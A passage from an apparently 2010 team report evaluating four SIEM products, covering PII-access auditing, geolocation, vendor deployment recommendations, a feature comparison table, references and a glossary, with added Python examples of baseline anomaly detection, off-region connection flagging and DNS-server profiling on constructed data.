Data breaches can be devastating to a company, especially a company that is small to medium in size. Being able to audit who is accessing PII (personally identifiable information) can be a business-saving control. Data breaches can cost anywhere from $90 to $300 US dollars per record. Statistics like this demonstrate how costly a database breach will likely be. The report below monitors users that access PII data in the payroll application. The blue line is a baseline for the five previous periods. This report ran for the week of 04/19/2010 to 04/26/2010, so the baseline is for the five previous weeks. We can see two periods where the current activity was out-of-baseline: the activity on 04/19/2010 and 04/22/2010. The top report displays the times and numbers of PII accesses. The bottom pane displays the users who accessed data in this period. We see jim and bob. If bob is accessing data outside of his job responsibility, the company can investigate why he was accessing the data, and determine what data he accessed.
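The baseline comparison this report describes (and the printer-volume check mentioned under DLP earlier, which is the same comparison applied to print jobs) as an added example, not vendor code: each day of the current week is compared with the same weekday over the five previous weeks, and the users active on a flagged day are listed. The counts, the per-user breakdown and the mean-plus-three-spreads rule are constructed assumptions, chosen so that 04/19 and 04/22 fall out of baseline.

```python
"""Out-of-baseline check: current week's daily counts versus the same
weekday over the five previous weeks. Added example with constructed
counts; the rule and the data are assumptions, not the vendor's algorithm."""
from datetime import date, timedelta
from statistics import mean, pstdev

WEEKDAYS = ["Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"]

# Constructed: daily PII access counts, Mon..Sun, for the five previous weeks.
BASELINE_WEEKS = [
    [12, 14, 13, 15, 11, 2, 1],
    [13, 12, 14, 14, 12, 1, 2],
    [11, 15, 12, 13, 13, 2, 1],
    [14, 13, 13, 15, 12, 1, 1],
    [12, 14, 12, 14, 11, 2, 2],
]

# Constructed: the current week, starting Monday 2010-04-19.
CURRENT_WEEK_START = date(2010, 4, 19)
CURRENT_WEEK = [31, 13, 14, 27, 12, 1, 2]

# Constructed: per-user access counts for the current week (date, user, count).
USER_ACCESS = [
    (date(2010, 4, 19), "jim", 12), (date(2010, 4, 19), "bob", 19),
    (date(2010, 4, 20), "jim", 13),
    (date(2010, 4, 21), "jim", 14),
    (date(2010, 4, 22), "jim", 14), (date(2010, 4, 22), "bob", 13),
    (date(2010, 4, 23), "jim", 12),
    (date(2010, 4, 24), "jim", 1),
    (date(2010, 4, 25), "jim", 2),
]


def baseline_thresholds(baseline_weeks, sigmas=3.0, min_spread=1.0):
    """Upper threshold per weekday: mean + sigmas * spread over the previous
    weeks. The spread floor keeps a perfectly flat baseline (spread 0) from
    flagging a change of a single access."""
    thresholds = []
    for day in range(7):
        samples = [week[day] for week in baseline_weeks]
        spread = max(pstdev(samples), min_spread)
        thresholds.append(mean(samples) + sigmas * spread)
    return thresholds


def out_of_baseline(current, baseline_weeks, week_start, user_access):
    """Days of the current week above their weekday threshold, with the
    users who accessed data that day as the starting point for an investigation."""
    thresholds = baseline_thresholds(baseline_weeks)
    findings = []
    for day, count in enumerate(current):
        if count <= thresholds[day]:
            continue
        when = week_start + timedelta(days=day)
        users = {user: n for d, user, n in user_access if d == when}
        findings.append({
            "date": when.isoformat(),
            "weekday": WEEKDAYS[day],
            "count": count,
            "threshold": round(thresholds[day], 1),
            "users": users,
        })
    return findings


if __name__ == "__main__":
    for f in out_of_baseline(CURRENT_WEEK, BASELINE_WEEKS, CURRENT_WEEK_START, USER_ACCESS):
        print(f)
```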


Nitro Security report showing the accessing of PII data by users jim and bob.


SIEM Correlation Rules

QRadar correlation editor


Behavior anomaly detection for processes

Prism Microsystems behavior anomaly

Change auditing showing types of changes (authorized, unauthorized, etc.)


Prism Microsystems change audit

Change audit summary


Prism Microsystems change audit

Risk prioritized alerts console


Prism Microsystems risk alerts console

Netflow v9 – Top 10 conversations


Prism Microsystems top ten conversations

Netflow v9 – Top 10 applications


Prism Microsystems top ten applications

Netflow v9 – Top 10 protocols


Prism Microsystems top ten protocols

Event log arrival rates in real-time


Prism Microsystems events per second report

Trend of user logons over 6 hours


Prism Microsystems logon trend report

Emerging Trends

One of the newest trends vendors are starting to market is the ability to integrate geolocation into the data using services like http://www.maxmind.com. This is a powerful tool that can help organizations pinpoint the source or destination of connections. Imagine an organization that does not do business outside a geographical location. Geolocation data can quickly pinpoint unauthorized access or connections based on an IP.
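The geolocation check just described, as an added example that is not part of the original project or of any vendor's product: each connection's remote address is mapped to a country and anything outside the region where the organisation does business is reported. The CIDR-to-country table is a constructed stand-in for a MaxMind-style database, and the internal ranges, allowed countries and connection records are constructed as well.

```python
"""Geolocation enrichment of connection records, flagging remote addresses
outside the organisation's business region. Added example; the geo table
is a constructed stand-in for a real database, not MaxMind data."""
import ipaddress

# Constructed: the organisation's own address space.
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed geo table using documentation ranges; a real deployment would
# query a geolocation database here.
GEO_TABLE = [
    (ipaddress.ip_network("203.0.113.0/25"), "US"),
    (ipaddress.ip_network("198.51.100.0/24"), "DE"),
    (ipaddress.ip_network("192.0.2.0/24"), "BR"),
]

# Constructed: the countries the organisation does business in.
ALLOWED_COUNTRIES = {"US", "CA"}

# Constructed connection records: (source IP, destination IP, destination port).
CONNECTIONS = [
    ("10.10.20.15", "203.0.113.10", 443),   # outbound to US: allowed
    ("198.51.100.7", "10.10.5.22", 22),     # inbound from DE
    ("10.10.20.31", "192.0.2.9", 443),      # outbound to BR
    ("10.10.20.42", "203.0.113.200", 443),  # not in the table: unknown
]


def lookup_country(ip):
    """'internal' for own address space, the country code from the table,
    or 'unknown' when the address is not covered. Unknown is reported rather
    than silently treated as allowed."""
    addr = ipaddress.ip_address(ip)
    if any(addr in net for net in INTERNAL_NETS):
        return "internal"
    for net, country in GEO_TABLE:
        if addr in net:
            return country
    return "unknown"


def off_region_connections(connections, allowed=ALLOWED_COUNTRIES):
    """Geolocate the remote end of each connection and report those outside
    the allowed countries, with the direction so an analyst can prioritise
    inbound access attempts over outbound traffic."""
    findings = []
    for src, dst, dport in connections:
        src_cc, dst_cc = lookup_country(src), lookup_country(dst)
        if src_cc == "internal" and dst_cc != "internal":
            remote, country, direction = dst, dst_cc, "outbound"
        elif dst_cc == "internal" and src_cc != "internal":
            remote, country, direction = src, src_cc, "inbound"
        else:
            # internal-to-internal or external-to-external: nothing to geolocate here
            continue
        if country not in allowed:
            findings.append({"remote": remote, "country": country,
                             "direction": direction, "port": dport})
    return findings


if __name__ == "__main__":
    for finding in off_region_connections(CONNECTIONS):
        print(finding)
```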


Geo-location table from Log Rhythm

Vendor Setups

QRadar Setup

Individual QRadar event collectors can scale up to and beyond 5,000 EPS. In a single data center environment, an all-in-one deployment (console, event collector/processor, and flow collector/processor) could handle this event rate. Depending on the inter-site bandwidth, it is possible to backhaul raw events from remote sites to a central collector. However, it is generally preferred to have collectors close to the point of collection. In this scenario, that would mean:

1. A central console at the primary site. This serves as the interface for viewing offenses, performing searches, and generating reports.

2. An event collector at the primary site. Assuming EPS is evenly distributed across both data centers, a 2,500 EPS license is sufficient.

3. An event collector at the secondary site. Again, assuming EPS is evenly distributed across both data centers, a 2,500 EPS license is sufficient.

It may be possible to use the existing log receivers to locally collect events and forward them to the central site. This requires further investigation into the capabilities of the log receivers.


As with all business decisions, we would have to evaluate bandwidth requirements to backhaul raw events and the cost of a distributed vs central SIEM deployment. It may even make financial sense to increase bandwidth between sites.

Another consideration is collection of network activity. QRadar has the capability to collect NetFlow, JFlow, and sFlow data from existing infrastructure equipment such as Cisco routers and switches. In addition, Q1 Labs provide our own collectors, QFlow collectors, which are tied into the infrastructure through mirror/SPAN port or network taps at strategic locations. NetFlow and JFlow provide connection information to layer 4; sFlow and QFlow provide application layer visibility for true application detection and content capture. The benefits of network visibility are:

1. Passive profiling of network assets. One of the challenges with SIEM is to provide context to rules, including where are my assets and what are their functions. Network monitoring can identify assets and profile them automatically, for initial setup and ongoing monitoring. For example, QRadar will automatically detect DNS servers and display them in a list for administrative approval. Any connections to DNS servers not in the approved list may trigger a rule that, for example, detects botnets trying to find their command and control server through fast-flux DNS servers.

2. Forensics. Network activity provides greater forensic data, allowing analysts to see information that may not be available from logs, to gain a wider view, so to speak. Content capture with QFlow or sFlow provides forensic depth. Let's face it, one of the first things an intruder will do once s/he compromises a machine is to turn off logging and erase his/her tracks. At this point, SIEM is blind without network activity logging.

3. Trend analysis and anomaly detection. QRadar will build a profile of normal network activity, including seasonal patterns. This can be used to detect statistical anomalies, deviations from expected patterns (20% increase in IM traffic, for example), and threshold violations. These can all be correlated with event activity in rules.
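The passive DNS-server profiling and approved-list rule from point 1 above, as an added example of the idea rather than Q1 Labs' implementation: candidate DNS servers are discovered from port-53 flows, the administrator approves the candidates, and clients that then query servers outside the approved list are reported. The flow records, addresses and the two-client and three-server thresholds are constructed assumptions.

```python
"""Passive profiling of DNS servers from flow records, then a rule that
flags clients querying DNS servers outside the approved list. Added
example with constructed flows; not vendor code."""
from collections import defaultdict

# Constructed flow records: (source IP, destination IP, destination port, protocol).
FLOWS = [
    ("10.10.20.15", "10.10.1.53", 53, "udp"),
    ("10.10.20.31", "10.10.1.53", 53, "udp"),
    ("10.10.20.42", "10.10.1.53", 53, "udp"),
    ("10.10.20.15", "10.10.1.54", 53, "udp"),
    ("10.10.20.31", "10.10.1.54", 53, "udp"),
    ("10.10.20.15", "203.0.113.80", 443, "tcp"),
    # One workstation spreading its queries over several Internet DNS servers.
    ("10.10.20.77", "198.51.100.9", 53, "udp"),
    ("10.10.20.77", "198.51.100.23", 53, "udp"),
    ("10.10.20.77", "203.0.113.200", 53, "udp"),
]


def discover_dns_servers(flows, min_clients=2):
    """Candidate DNS servers: destinations of port-53 traffic used by at least
    min_clients distinct sources. A server seen from a single host is left
    out so one machine cannot profile its own resolver into the list; the
    candidates are what an administrator reviews and approves."""
    clients = defaultdict(set)
    for src, dst, dport, _proto in flows:
        if dport == 53:
            clients[dst].add(src)
    return {dst for dst, srcs in clients.items() if len(srcs) >= min_clients}


def unapproved_dns_use(flows, approved, many=3):
    """Per client, the unapproved DNS servers it queried. Severity is 'high'
    when a client touches 'many' different unapproved servers, the pattern
    the text associates with fast-flux command-and-control lookups."""
    per_client = defaultdict(set)
    for src, dst, dport, _proto in flows:
        if dport == 53 and dst not in approved:
            per_client[src].add(dst)
    return {
        src: {"servers": sorted(dsts),
              "severity": "high" if len(dsts) >= many else "medium"}
        for src, dsts in per_client.items()
    }


if __name__ == "__main__":
    # In practice the discovered set is shown to an administrator for approval;
    # here the candidates are approved as-is.
    approved = discover_dns_servers(FLOWS)
    print("approved DNS servers:", sorted(approved))
    for client, detail in unapproved_dns_use(FLOWS, approved).items():
        print(client, detail)
```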

Prism Microsystems Setup

EventTracker was designed specifically for the Medium Enterprise such as JWP. As a software-only solution that runs on a user-provided Windows platform, it is ideally suited to this network. EventTracker can either collect agentless (via polling the Windows event log) or through an agent we provide. We recommend utilizing the agent as it provides a number of compelling benefits.

The EventTracker agent is extremely lightweight, highly flexible and centrally managed and deployed.


One of the significant disadvantages with a polling method is that the duration between each poll enables hackers to modify the system and cover their tracks through turning off auditing or wiping out the event log. With an agent, the events are pushed in real time, putting the logs beyond the reach of a person seeking to cover their tracks. Also, in the case of system problems that could potentially corrupt the system, the logs of the events leading up to the crash could be lost if the system event log is corrupted. With an agent these valuable records have already been retained.

EventTracker agents allow fine grained control of event forwarding. The agent can send all events in real-time, a subset of critical events in real-time and the others in encrypted compressed files on a periodic basis, or if the system is not critical, all the logs on a batch basis, via a guaranteed, compressed and secure transmission.

The EventTracker agent also provides capabilities beyond simply collecting the Windows Event Log. It enables the user to perform:

• Change auditing
• USB device monitoring (including writes to devices)
• Application monitoring
• Custom log file monitoring
• Network connection monitoring
• Network install/uninstall monitoring
• Process monitoring

Nitro Security Setup

Recommendations

• 1 NitroView ESM, 1 Receiver, and 1 DBM at the Primary site
• 1 Receiver OR Nitro Agents in the DMZ
• 1 Receiver at the Secondary Site

Also recommended: 2 IPS to be deployed, one at each site after the firewall. This is to meet the objectives of:

• Identify common attacks and what log entries they produce
• Prevention of in-bound attacks (both external/internal)
• Prevention of outbound data loss (DLP)
• Mitigating against infected systems

Log Rhythm

Recommendations

• 1 EM appliance at the primary site
• 1 LM appliance at the main site
• 1 LM appliance at the remote site


Use Log Rhythm agents on UNIX and Windows hosts. Standard syslog agent on all other hosts.

6. Conclusions

When the team received this assignment, our initial thoughts were that some vendors would not be able to meet the project criteria. During interviews with the vendors, it became obvious our use cases are solved by the vendors on a routine basis. The vendors were able to address all use cases presented to them. To security staff on the front lines, these use cases (your boss may refer to them as "opportunities") can be daunting. Each vendor had a niche to separate his or her product from the competition. The use cases presented to the vendors were no big deal for the vendors. Here is a summary of some special features each vendor felt separated him or her from the competition.

Log Rhythm
• Powerful agent that allowed audits and monitoring of remote systems. Helps cut cost by replacing redundant tools
• Powerful regular expression rules engine
• Easy to use interface

Nitro Security
• Geo location feature, narrow traffic to a city/zip code
• EDB database is very fast
• Content aware SIEM

QRadar
• ARIEL back-end database optimized for write-once, read many
• Correlation editor is simple to use, similar in look to Microsoft Outlook's rules wizard
• Auto discovery capability - discover and apply context rules to new devices

Prism Microsystems
• Software only solution, allows customer to size the hardware according to needs
• Data stored in CAB files, no back-end database or DBA needed
• Powerful Windows agent with improved data monitoring and auditing on the remote system

If you read Anton Chuvakin's blog you will find that searches for an open source SIEM are higher than for open source log management. Anton writes about this phenomenon periodically. Meeting with security professionals, it is easy to find smart people who have undertaken the yeoman's task of developing an in-house log management/SIEM for their environment. Most will tell you they were able to cobble together some tools and satisfy needs on a small scale with limited success. Scaling out to multiple log sources and higher volume uses shows the futility of trying to develop your own solution. One of our team members undertook this task and was the poster child for the above situation.

A SIEM can provide a powerful resource to any organization if used correctly and with purpose. Implementing a SIEM involves more than pointing log sources at it and scheduling reports. The reports or alerts are a starting point, not an endpoint. The alert is the product of applying intelligence to a series of events and drawing a conclusion from those events. The analyst is the person who applies the business, environmental and context knowledge against the alert to determine the next steps. A SIEM requires processes and procedures to keep it running. There is the constant battle of log sources not sending, retirement of servers, implementation of new servers, new reporting requirements, investigations of daily operations and alerts, etc. There is a large amount of work, but done correctly it is rewarding and extremely valuable to any environment.

Finally, if you are investigating the use of a SIEM and the vendor claims there is little to no staff required -- run! Any tool is only as good as the analyst running it. The analyst needs to provide the care and feeding to keep the environment running. The analyst has the business and environmental knowledge while reviewing the context and content of an alert. The analyst should be improving rules to meet business needs, ignoring data with no value, and verifying log sources are kept current. In the right environment a SIEM can offer exceptional value to an organization.

Vendor Summary

(A - Automatically, M - Manually, N - Not Available)

Use case                                                  Log Rhythm   QRadar   Prism Micro   Nitro
Identify common attacks and what log entries they produce  A            A        A             A
Detection of in-bound attacks (both external/internal)     A            A        A             A
Detection of outbound data loss (DLP)                      A            A        A             A
Identifying infected systems                               A            A        A             A
Mitigating against infected systems                        A            A        A             A
Use and misuse of privileged accounts                      A            A        A             A
Access to sensitive information (database information      A            A        A             A
  such as payroll)
Geo location                                               A            A        A             A
Learning Curve (* - ***/slower - faster)                   *            NA       *             ***
Setup Time (* - ***/slower - faster)                       *            ***      *             **
Unique Features                                            Powerful agent collectors; Auto discover and context rule applying; Data stored in flat files; Fastest DB - EDB
Business Openness (* - ***/Difficult - Open)               **           ***      ***           ***

7. References

Syslog in Wikipedia. http://en.wikipedia.org/wiki/Syslog as on April 15, 2010.

Ponemon Institute - 2009 Annual Cost of Data Breach, www.pgp.com/insight/newsroom/press_release/2009_annual_study_cost_of_data_breach, as on May 5th, 2010

The System Logging Dæmons, syslogd and klog. (2000). http://www.linuxjournal.com/article/4036, as on April 15, 2010

Linux Administration Handbook, Second Edition (Nemeth, Snyder, Hein), October 2006

Essential SNMP, Second Edition (Mauro, Schmidt), September 2005

Syslog-ng in Wikipedia. http://en.wikipedia.org/wiki/Syslog-ng, as on April 15, 2010

RSyslog - History. http://www.rsyslog.com/doc-history.html, as on April 16, 2010

Bejtlich, Richard, The Tao of Network Security Monitoring. Addison Wesley, 2005

Bejtlich, Richard, Extrusion Detection: Security Monitoring for Internal Intrusions. Addison Wesley, 2006

IOS configuring snmptrap. (2008) http://www.cisco.com/en/US/tech/tk648/tk362/technologies_tech_note09186a0080094a05.shtml

Configuring Netflow. (2001). http://www.cisco.com/en/US/docs/ios/12_1/switch/configuration/guide/xcdnfc.html#wp1000872

Akin, Thomas (2002). Hardening Cisco Routers. http://oreilly.com/catalog/hardcisco/chapter/ch10.html

PIX/ASA 7.x and later with Syslog Configuration Example. (2007). http://www.cisco.com/en/US/products/hw/vpndevc/ps2030/products_configuration_example09186a00805a2e04.shtml#as

Intersect Alliance, Snare Epilog for Windows. (2010). http://www.intersectalliance.com/projects/EpilogWindows/index.html

Bowen, Rich. (2006). Sending Apache httpd Logs to Syslog. http://tim.oreilly.com/pub/a/sysadmin/2006/10/12/httpd-syslog.html

Guide to SNARE for MSSQL. (2010). http://www.intersectalliance.com/resources/Documentation/Guide_to_SNARE_for_MSSQL-1.0.pdf

Lupal. (2008). The Honeynet Project, The Lupper Worm. http://www.honeynet.org/node/39

Emerging threats snort rules. (2010). http://www.emergingthreats.net/rules/

Extrusion Detection Security Monitoring for Internal Systems pp. 83-84

Gaudin, Sharon. (2007). Security Breaches Cost $90 To $305 Per Lost Record. http://www.informationweek.com/news/security/showArticle.jhtml?articleID=199000222


8. Appendix

Helpful WEB sites:

Anton Chuvakin Blog - "Security Warrior": http://chuvakin.blogspot.com/

TaoSecurity: http://taosecurity.blogspot.com/

SANS Blogs: https://blogs.sans.org


Mandiant Blog: http://blog.mandiant.com/

Internet Storm Center: http://isc.sans.org/

WEB Sites for vendors participating in the project

QRadar: http://www.q1labs.com/

Prism Microsystems: http://www.prismmicrosys.com/

Nitro Security: http://nitrosecurity.com/

Log Rhythm: http://logrhythm.com/

A: Glossary

ASA Adaptive Security Appliance – Successor to Cisco’s PIX firewall.

BIND Berkeley Internet Name Daemon – A popular implementation of DNS.

BSD Berkeley Software Distribution (BSD, sometimes called Berkeley Unix) is the UNIX operating system derivative developed and distributed by the Computer Systems Research Group (CSRG) of the University of California, Berkeley, from 1977 to 1995.

CDMA Code Division Multiple Access – A channel access method used by various radio communication technologies.

CPU Central Processing Unit - the portion of a computer system that carries out the instructions of a computer program, and is the primary element carrying out the computer's functions.

DLP Data Loss Prevention - a system designed to detect and prevent unauthorized use or transmission of data.

DNS Domain Name System - a hierarchical naming system for computers, services, or any resource connected to the Internet.


DoS/DDoS Denial of Service/Distributed Denial of Service – an attack designed to render a target system unusable for its intended purpose.

DST Daylight Savings Time - the practice of temporarily advancing clocks so that afternoons have more daylight and mornings have less.

FWSM FireWall Services Module - integrated firewall module for Cisco Catalyst 6500 switches and Cisco 7600 Series routers, based on Cisco's PIX firewall.

GPS Global Positioning System

HVAC stands for the closely related functions of Heating, Ventilating, and Air Conditioning.

I/O Input Output

IDS Intrusion Detection System - software and/or hardware designed to detect unwanted attempts at accessing, manipulating, and/or disabling of computer systems through a network.

IKE IPSec Key Exchange – a general purpose key exchange protocol.

IOS Internetworking Operating System used by Cisco network devices.

IP Internet Protocol - a protocol used for communicating data across a packet-switched internetwork, also referred to as TCP/IP

IPS Intrusion Prevention System – a system that monitors network and/or computer activities for malicious or unwanted behavior and can block or prevent those activities.

IPsec Internet Protocol security - a protocol suite for securing Internet Protocol (IP) communications.

netflow A network protocol used for collecting IP traffic information on network devices

NTP Network Time Protocol – provides a means of synchronizing clocks over a computer network.

PIX Private Internet eXchange – a popular Cisco firewall appliance.


RFC Request For Comment - a document published by the IETF (Internet Engineering Task Force) that describes the innovations, behaviors, research, or methods that apply to the working of the Internet and Internet-connected systems.

RMON Remote Network MONitoring

SIEM Security Information and Event Monitoring

SNMP Simple Network Management Protocol - used to monitor and manage network-attached devices.

TCP Transport Control Protocol - one of the core protocols of the Internet protocol suite that uses implicit hand-shaking dialogues for guaranteeing reliability, ordering, and data integrity.

TLS Transport Layer Security (TLS) and its predecessor, Secure Socket Layer (SSL), are cryptographic protocols that provide security for communications over networks such as the Internet.

UDP User Datagram Protocol - uses a simple transmission model without implicit hand-shaking dialogues for guaranteeing reliability, ordering, or data integrity.

UPS An Uninterruptible power supply (UPS), also known as a battery backup, provides emergency power and, depending on the topology, line regulation as well to connected equipment by supplying power from a separate source when utility power is not available.

UTC Coordinated Universal Time - is a time standard based on International Atomic Time (TAI) with leap seconds added at irregular intervals to compensate for the Earth's slowing rotation.

VoIP Voice over Internet Protocol (VoIP) is a general term for a family of transmission technologies for delivery of voice communications over IP networks.

VPN Virtual Private Network - a network that is layered on top of an underlying computer network to provide confidentiality.

WAP Wireless Access Point
